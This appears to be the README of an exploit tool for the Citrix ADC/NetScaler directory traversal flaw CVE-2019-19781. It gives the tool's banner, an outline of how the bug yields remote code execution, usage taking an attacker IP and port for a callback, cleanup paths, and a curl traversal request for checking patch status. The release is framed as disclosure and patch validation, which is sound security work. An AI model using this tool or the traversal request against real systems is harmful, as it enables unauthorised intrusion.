CVE-2019-19781

This was only uploaded due to other researchers publishing their code first. We would have hoped to have had this hidden for awhile longer while defenders had appropriate time to patch their systems.

We are all for responsible disclosure, in this case - the cat was already out of the bag.

Exploits: CVE-2019-19781

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py

Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ Forensics and IOCS: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/

This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

Usage:

python citrixmash.py <attacker_listener> <attacker_port>

usage: citrixmash.py [-h] target targetport attackerip attackerport

Validate Patch

If you want to test to see if this exposure is mitigated use the following:

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is

403 means that you are patched.

If you can see smb.conf, then you are vulnerable.